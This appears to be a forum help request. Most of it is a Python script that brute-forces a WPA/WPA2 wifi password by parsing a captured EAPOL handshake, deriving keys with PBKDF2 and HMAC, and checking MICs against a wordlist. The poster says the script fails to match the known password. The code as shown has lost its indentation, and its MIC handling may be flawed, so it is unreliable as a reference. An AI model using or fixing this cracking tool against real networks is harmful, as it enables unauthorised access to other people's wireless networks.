Here's my wifi bruteforce program:
from hmac import new
from time import sleep
from pyshark import FileCapture
from binascii import a2b_hex, b2a_hex
from hashlib import pbkdf2_hmac, sha1, md5
def MakeMIC(pwd, ssid, A, B, data, wpa=False):
pmk = pbkdf2_hmac('sha1', pwd.encode('ascii'), ssid.encode('ascii'), 4096, 32)
nByte = 64
i = 0
R = b''
while i <= (nByte * 8 + 159) / 160:
R += new(pmk, A + chr(0x00).encode() + B + chr(i).encode(), sha1).digest()
i += 1
ptk = R[0:nByte]
return [new(ptk[0:16], i, md5 if wpa else sha1).digest() for i in data], ptk, pmk
def RunTest(ssid, psk, aNonce, sNonce, apMac, clMac, mic1, data1):
mics, ptk, pmk = MakeMIC(psk, ssid, b'Pairwise key expansion', min(apMac, clMac) + max(apMac, clMac) + min(aNonce, sNonce) + max(aNonce, sNonce), [data1])
mic1Str = mic1.upper()
micStr = b2a_hex(mics[0]).decode().upper()[:-8]
if micStr == mic1Str:
print('PMK:\t\t' + b2a_hex(pmk).decode().upper())
print('PTK:\t\t' + b2a_hex(ptk).decode().upper() + '\n')
print('Target MIC:\t' + mic1Str)
print('Actual MIC:\t' + micStr)
return True if micStr == mic1Str else False
def crack_CAP(txtfile, ssid, capfile):
cap = FileCapture(capfile, display_filter='eapol')
eap1, eap2, wla2 = cap[0]['EAPOL'], cap[1]['EAPOL'], cap[1]['WLAN']
aNonce = a2b_hex(eap1.get_field_value('wlan_rsna_keydes_nonce').replace(':', ''))
print('access point Nonce: ' + eap1.get_field_value('wlan_rsna_keydes_nonce').replace(':', ''))
sNonce = a2b_hex(eap2.get_field_value('wlan_rsna_keydes_nonce').replace(':', ''))
print('client Nonce: ' + eap2.get_field_value('wlan_rsna_keydes_nonce').replace(':', ''))
apMac = a2b_hex(wla2.get_field_value('bssid_resolved').replace(':', ''))
print('access point MAC: ' + wla2.get_field_value('bssid_resolved').replace(':', ''))
clMac = a2b_hex(wla2.get_field_value('staa_resolved').replace(':', ''))
print('client MAC: ' + wla2.get_field_value('staa_resolved').replace(':', ''))
mic1 = eap2.get_field_value('wlan_rsna_keydes_mic').replace(':', '')
print('2^nd handshake MIC: ' + eap2.get_field_value('wlan_rsna_keydes_mic').replace(':', ''))
data1 = ''
for i in eap2.field_names:
# version, type, keydes_type can be integers greater than 9...
if i in ['version', 'type', 'keydes_type']:
data1 += f'0{eap2.get_field_value(i)}:'
elif i in ['len', 'wlan_rsna_keydes_data_len']:
data1 += f"{((int(eap2.get_field_value(i)) >> 8) & 0xff):02x}:{(int(eap2.get_field_value(i)) & 0xff):02x}:"
elif i in ['wlan_rsna_keydes_key_info']:
data1 += f"{((int(eap2.get_field_value(i), 16) >> 8) & 0xff):02x}:{(int(eap2.get_field_value(i), 16) & 0xff):02x}:"
elif i.startswith('wlan_rsna_keydes_key_info') and len(i.split('_')) > 5:
pass
elif i == 'keydes_key_len':
data1 += f'0{eap2.get_field_value(i)}:' * 2
elif i == 'keydes_replay_counter':
data1 += '00:' * 7 + f'0{eap2.get_field_value(i)}:'
elif i in ['wlan_rsna_keydes_nonce', 'keydes_key_iv', 'wlan_rsna_keydes_rsc', 'wlan_rsna_keydes_id',
'wlan_rsna_keydes_mic']:
data1 += eap2.get_field_value(i) + ':'
elif i == 'wlan_rsna_keydes_data':
data1 += eap2.get_field_value(i)[:-6]
print('2^nd handshake Data: ' + data1.replace(':', ''))
data1 = a2b_hex(data1.replace(':', ''))
with open(txtfile, 'r') as f:
for psk in f:
sleep(1)
password = psk.strip()
if RunTest(ssid, password, aNonce, sNonce, apMac, clMac, mic1, data1):
print('MATCH! ' + password)
break
else:
print('MISMATCH! ' + password)
f.close()
if __name__ == "__main__":
crack_CAP(r'C:\Users\Username\Downloads\passwords.txt', 'SSIDName', r'C:\Users\Username\Downloads\mycapture.cap')
The code perfectly works with no errors. The capture file came from Microsoft Network Monitor 3.4. I intended to put the actual password on the 20th line of passwords.txt but unfortunately it doesn't match. Is there something wrong with the code?
I tried to forget the password but did not work, I also tried to use bssid and staa without "_resolved" and still did not work. I even tried to set wpa=True and no chance. I'm using a Huwawei router which is the most common one on the planet, So how do I get password match not mismatch? T.Y.
